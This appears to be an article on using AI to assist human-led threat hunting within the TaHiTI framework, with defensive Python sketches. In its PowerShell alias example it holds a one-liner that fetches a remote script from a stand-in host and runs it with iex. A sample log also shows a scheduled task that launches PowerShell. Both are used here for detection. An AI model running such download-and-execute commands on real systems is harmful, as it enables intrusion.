AI is everywhere right now. It’s in your inbox, your social feeds and even your car. And in cybersecurity, it’s being pitched as the magic bullet that will finally let defenders keep up with attackers. I’ve covered enough hype cycles to know that’s never the whole story.
AI in threat hunting is no exception — it’s powerful, but it’s not a panacea.
Not long ago, many companies flat-out banned tools like ChatGPT out of fear of data leaks and productivity risks. Who am I kidding? Many companies are still doing that right now.
But fast-forward a year, and CISOs are experimenting with agentic AI to automate workflows and plug skills gaps. Meanwhile, attackers are busy too, using AI to polish phishing lures, generate deepfakes and even script parts of data extortion campaigns.
There's an important distinction, though: using AI for individual steps in an attack isn't the same as AI running the whole operation. That vision of AI-driven kill chains outpacing human defenders is still more science fiction than fact. For now, the most interesting action is on the defender's side, where AI is starting to take on a practical role as a co-pilot in human-led hunts.
A Framework for Reality: TaHiTI
One of the most interesting arenas for AI's emerging role is threat hunting. Intel 471 has released a report detailing how it employs TaHiTI (Targeted Hunting integrating Threat Intelligence) to streamline and automate threat hunting. Developed in the financial sector, the framework breaks hunting into three phases: Initiate, Hunt and Finalize. It's vendor-neutral and forces structure on what can otherwise be chaotic work.
Scott Poley, a senior threat hunt analyst with Intel 471, points out that TaHiTI works precisely because it reflects the cyclical nature of hunts. You don't just test a hypothesis once; you refine it, run it against your environment and iterate until you've distinguished normal behavior from the truly malicious.
AI can speed that process, but it can't replace the institutional knowledge that separates theory from reality.
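To make the cycle concrete, here's a minimal Python sketch of a TaHiTI-style hunt loop. The record fields, the triage stub and the loop logic are my own illustration of the iterate-and-refine idea; neither the framework nor Intel 471 prescribes any particular implementation.

```python
from dataclasses import dataclass, field

@dataclass
class Hunt:
    """Illustrative record for one TaHiTI-style hunt; field names are assumptions."""
    hypothesis: str                                  # Initiate: what we think is happening
    baseline: set[str] = field(default_factory=set)  # behavior confirmed benign so far
    findings: list[str] = field(default_factory=list)

def looks_benign(event: str) -> bool:
    # Toy stand-in for triage; in a real hunt this is the analyst's judgment call.
    return "trusted" in event

def run_hunt(hunt: Hunt, events: list[str], max_passes: int = 5) -> Hunt:
    """Hunt phase: test, triage, fold baselines back in, and iterate."""
    for _ in range(max_passes):
        hits = [e for e in events if e not in hunt.baseline]
        if not hits:
            break                          # nothing new: move to Finalize (report, hand off)
        for hit in hits:
            if looks_benign(hit):
                hunt.baseline.add(hit)     # refine: this is normal in our environment
            else:
                hunt.findings.append(hit)
                hunt.baseline.add(hit)     # don't re-surface it on the next pass
    return hunt

result = run_hunt(Hunt("rare binaries launching PowerShell"),
                  ["trusted updater spawning powershell",
                   "unknown dropper spawning powershell"])
print(result.findings)  # -> ['unknown dropper spawning powershell']
```

The point of the loop is the feedback: each pass folds what's normal back into the baseline, so what's left over gets progressively more interesting.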
Sounding Board, Not Oracle
When you’re kicking off a hunt, AI can help stress-test a hypothesis or map tactics to MITRE ATT&CK. Poley told me that one of AI’s biggest strengths today is hypothesis development and expedited research. It can give junior analysts a boost by surfacing behaviors or techniques that senior analysts already recognize as relevant, bridging that skills gap.
At the same time, he warned about the tendency of large language models to be overly agreeable. To keep AI honest, he takes a step-by-step approach — laying out what he knows, then asking the model to validate or challenge it. That conversational style, he said, leads to better insights and avoids being misled.
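As a rough illustration of that conversational style, here's what stress-testing a hypothesis might look like in code. The `openai` client and model name are just one possible stack, and the prompt wording is my own invention, not Poley's; the technique is simply instructing the model to push back rather than agree.

```python
# A minimal sketch of LLM-assisted hypothesis stress-testing.
# Assumes the `openai` Python package and an OPENAI_API_KEY in the environment;
# the model name and prompt wording are illustrative, not prescriptive.
from openai import OpenAI

client = OpenAI()

hypothesis = (
    "An attacker is using scheduled tasks (ATT&CK T1053.005) for persistence "
    "on our Windows servers, creating tasks that launch PowerShell at boot."
)
known_facts = [
    "EDR covers all Windows servers with 60-day retention.",
    "We baseline scheduled-task creation weekly.",
]

# Step-by-step framing: state what you know, then ask the model to challenge it,
# which counters the tendency of LLMs to be overly agreeable.
messages = [
    {"role": "system", "content": (
        "You are a skeptical threat-hunting peer. Do not simply agree. "
        "Challenge weak assumptions and say what evidence would falsify the hypothesis."
    )},
    {"role": "user", "content": (
        f"Hypothesis: {hypothesis}\n"
        f"What I already know: {'; '.join(known_facts)}\n"
        "1) Which assumptions are weakest? 2) Which ATT&CK techniques are adjacent? "
        "3) What data would prove or disprove this?"
    )},
]

response = client.chat.completions.create(model="gpt-4o", messages=messages)
print(response.choices[0].message.content)
```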
Queries, Clusters and Context
Once you’re in the weeds, AI can template queries and point you to documentation faster than scrolling through search results. That’s a real time saver for junior analysts. But Poley also noted that AI often struggles with syntax or optimization. He has had to correct AI-generated queries himself and feed the right syntax back, only to get a casual “that makes sense” in return.
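Here's a hedged sketch of the kind of query templating involved. The SPL-style search string and the field names (`EventCode`, `New_Process_Name`) are assumptions that vary by environment, and AI-generated versions often need exactly the syntax fixes Poley describes.

```python
# Illustrative hunt-query templating; not tied to any specific SIEM.
def build_rare_process_query(index: str, binary: str, threshold: int = 5) -> str:
    """Fill a query skeleton; a human should still review it before it runs."""
    return (
        f'index={index} EventCode=4688 '              # Windows process-creation events
        f'New_Process_Name="*\\\\{binary}" '
        f'| stats count by host, New_Process_Name '
        f'| where count < {threshold}'                 # surface rarely seen launches
    )

print(build_rare_process_query("wineventlog", "powershell.exe"))
```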
Where AI really shines is in enrichment. Threat hunts often risk tunnel vision — fixating on a single artifact or path. AI can help expand the perspective, linking activity to adjacent threat actor techniques or surfacing aliases in PowerShell that a hunter might overlook. Poley described this as the kind of context that turns a small win into a more complete hunt.
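PowerShell aliases are a good example of that enrichment: shorthand like `iex` and `iwr` can hide familiar cmdlets in command-line logs. The sketch below uses a handful of genuine aliases, though the normalization logic around them is just one illustrative way to do it.

```python
import re

# These alias-to-cmdlet mappings are real Windows PowerShell defaults;
# the surrounding enrichment logic is illustrative.
POWERSHELL_ALIASES = {
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
    "sal": "Set-Alias",
    "gci": "Get-ChildItem",
    "ni":  "New-Item",
}

def expand_aliases(command_line: str) -> str:
    """Rewrite known aliases to full cmdlet names so hunts don't overlook them."""
    def replace(match: re.Match) -> str:
        token = match.group(0)
        return POWERSHELL_ALIASES.get(token.lower(), token)
    return re.sub(r"\b[a-zA-Z]+\b", replace, command_line)

# A terse one-liner becomes much easier to triage once expanded.
print(expand_aliases('powershell -nop -c "iwr http://example.com/a.ps1 | iex"'))
# -> powershell -nop -c "Invoke-WebRequest http://example.com/a.ps1 | Invoke-Expression"
```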
Data Is Destiny
Here’s the blunt truth: if your logs only go back 30 or 60 days, AI will just amplify the gaps. Lee Archinal, also a senior threat hunt analyst at Intel 471, explained that EDR data with short retention makes benign but rare behaviors — like opening Word once a month — look like anomalies. SIEMs with longer histories are more helpful but still need human tuning to distinguish real threats from statistical noise.
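A toy example makes Archinal's point concrete. The numbers and window sizes below are fabricated, but the effect is real: the same monthly habit looks like a one-off anomaly in a 30-day window and like an obvious pattern in a 180-day one.

```python
from datetime import datetime, timedelta

# Fabricated data: a user opens Word roughly every 35 days.
now = datetime(2025, 6, 1)
word_launches = [now - timedelta(days=35 * i) for i in range(6)]

def launches_within(days: int) -> int:
    cutoff = now - timedelta(days=days)
    return sum(1 for ts in word_launches if ts >= cutoff)

for window in (30, 60, 180):
    count = launches_within(window)
    verdict = "looks like an anomaly" if count <= 2 else "clearly periodic"
    print(f"{window:>3}-day retention: {count} launch(es) -> {verdict}")
```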
Archinal stressed that AI is best seen as a tool to make tasks easier, not as a replacement for human expertise. You still need an analyst who understands when to apply enrichment, what baselines matter in your environment and how to tell the difference between a quirk of user behavior and a true compromise.
Let AI Draft, Let Humans Decide
No one loves writing reports. AI is fantastic at pulling together structured summaries with executive takeaways and technical detail. Done right, that consistency reduces cognitive load for stakeholders and speeds handoffs to SOC, IR and vulnerability management teams.
This is where AI can make threat hunters more efficient without putting the organization at risk. Let the model draft, then let the human edit.
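A sketch of that draft-then-edit split is below. The section headings and the `Finding` shape are my own illustration of one reasonable workflow, not a format anyone prescribes; whether the draft comes from a template or an LLM, the handoff is the same.

```python
# Illustrative draft-then-review flow for hunt reporting.
from dataclasses import dataclass

@dataclass
class Finding:
    title: str
    technique: str   # e.g. an ATT&CK ID
    detail: str

def draft_report(hypothesis: str, findings: list[Finding]) -> str:
    """Machine-drafted skeleton: consistent structure, zero judgment calls."""
    lines = [
        "Executive Summary",
        f"Hunt hypothesis: {hypothesis}",
        f"Findings: {len(findings)} item(s) requiring follow-up.",
        "",
        "Technical Detail",
    ]
    for f in findings:
        lines.append(f"- {f.title} ({f.technique}): {f.detail}")
    return "\n".join(lines)

draft = draft_report(
    "Scheduled tasks used for persistence (T1053.005)",
    [Finding("Unsigned task on HOST-07", "T1053.005",
             "Task launches PowerShell at boot.")],
)
# The human step: an analyst edits the draft, checks every claim, and decides
# what goes to SOC, IR and vulnerability management. The model never decides.
print(draft)
```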
The Road Ahead
Looking forward, AI’s role in retrospective analysis and playbooks may prove most valuable. Running yesterday’s hunt against 90 days of logs to spot trends or test hypotheses is grunt work tailor-made for AI. Over time, that history can even train systems to suggest “next steps” based on what worked in similar cases.
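As a sketch of that grunt work: replaying a hunt predicate over retained logs is simple to automate, which is exactly why it's a good first target. Everything below, from the log shape to the predicate, is illustrative; real records would come from your SIEM's API.

```python
from datetime import datetime, timedelta
from typing import Callable

# Illustrative log records with fabricated timestamps.
logs = [
    {"ts": datetime(2025, 5, 20), "host": "HOST-07",
     "cmd": "schtasks /create /tn upd /tr powershell.exe"},
    {"ts": datetime(2025, 4, 2), "host": "HOST-11",
     "cmd": "notepad.exe report.txt"},
]

def replay_hunt(predicate: Callable[[dict], bool], days_back: int = 90) -> list[dict]:
    """Re-run yesterday's hunt logic over a longer history to surface trends."""
    cutoff = datetime(2025, 6, 1) - timedelta(days=days_back)
    return [rec for rec in logs if rec["ts"] >= cutoff and predicate(rec)]

# Yesterday's hypothesis as a predicate: scheduled tasks launching PowerShell.
hits = replay_hunt(lambda r: "schtasks" in r["cmd"] and "powershell" in r["cmd"])
for h in hits:
    print(h["ts"].date(), h["host"], h["cmd"])
```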
But automation should reflect human decisions, not replace them. Poley gave me a vivid example: in an incident, disabling an account might stop an attacker — but it might also break a core business process if done at the wrong time. That’s a decision no AI should make without human oversight.
The lesson? AI is here to stay in threat hunting, but it belongs in the loop — not on the trigger. Use it to scale enrichment, clustering and reporting. Anchor it with frameworks like TaHiTI. And above all, treat it as a co-pilot, not an autopilot.
Attackers are experimenting with AI too, but defenders have an opportunity to use it more responsibly and effectively. The difference will come down to how well we understand the limits and how disciplined we are about keeping humans in charge.